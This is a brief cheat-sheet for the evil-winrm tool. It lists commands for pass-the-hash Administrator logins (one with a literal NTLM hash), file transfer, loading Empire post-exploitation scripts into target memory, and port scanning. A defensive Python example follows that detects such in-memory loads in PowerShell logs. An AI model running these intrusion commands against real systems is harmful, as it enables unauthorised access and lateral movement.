# evil-winrm

* Authenticate with a password or an NTLM hash

```sh
evil-winrm -u Administrator -H -i IP
evil-winrm -u Administrator -p -i IP -P
```

## Upload & Download

* In an open session on the host

```sh
upload
download
```

## Load PowerShell Scripts into Target Memory

* Load attacker scripts into the target's memory

```sh
evil-winrm -u -p -i IP -s
```

* As an example, load the Empire scripts directory for port scanning

```sh
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
```

* Init `Invoke-Portscan.ps1`
* `Get-Help Invoke-Portscan`

```sh
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
```
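
How the in-memory script load above looks from the target's PowerShell logs, as an added example that is not part of the original page: it reassembles fragmented Script Block Logging records (event 4104) and flags watched function definitions that have no on-disk `Path`. It assumes Script Block Logging is enabled on the host; the dict layout, the `ev` helper, the host name `srv01` and all sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Function names to alert on; Invoke-Portscan is the one this page loads.
WATCHLIST = {"invoke-portscan"}
FUNC_DEF = re.compile(r"\bfunction\s+([\w-]+)", re.IGNORECASE)

def reassemble(events):
    """Join 4104 fragments (MessageNumber of MessageTotal) per ScriptBlockId."""
    frags, meta = defaultdict(dict), {}
    for ev in events:
        if ev["EventID"] != 4104:
            continue
        sid = ev["ScriptBlockId"]
        frags[sid][ev["MessageNumber"]] = ev["ScriptBlockText"]
        meta[sid] = (ev["Computer"], ev["Path"], ev["MessageTotal"])
    for sid, parts in frags.items():
        computer, path, total = meta[sid]
        text = "".join(parts[n] for n in sorted(parts))
        yield sid, computer, path, text, len(parts) == total

def find_in_memory_loads(events, watchlist=WATCHLIST):
    """Alert on watched functions defined in blocks that have no on-disk Path."""
    alerts = []
    for sid, computer, path, text, complete in reassemble(events):
        if path:  # block was read from a script file on the host itself
            continue
        for name in FUNC_DEF.findall(text):
            if name.lower() in watchlist:
                alerts.append((computer, sid, name, complete))
    return alerts

def ev(sid, num, total, path, text):
    """Build one constructed 4104 record (hypothetical export layout)."""
    return {"EventID": 4104, "Computer": "srv01", "ScriptBlockId": sid,
            "MessageNumber": num, "MessageTotal": total,
            "Path": path, "ScriptBlockText": text}

# Constructed sample: the function name is split across two fragments.
SAMPLE = [
    ev("a1", 2, 2, "", "tscan { param($Hosts, $TopPorts) }"),
    ev("a1", 1, 2, "", "function Invoke-Por"),
    ev("b2", 1, 1, r"C:\Scripts\inventory.ps1", "function Get-Inventory { Get-Service }"),
    {"EventID": 4624, "Computer": "srv01"},
]

if __name__ == "__main__":
    for alert in find_in_memory_loads(SAMPLE):
        print(alert)
```

Matching on single fragments would miss the split name, which is why the records are joined by `ScriptBlockId` before the regex runs; the last tuple element reports whether every fragment was present.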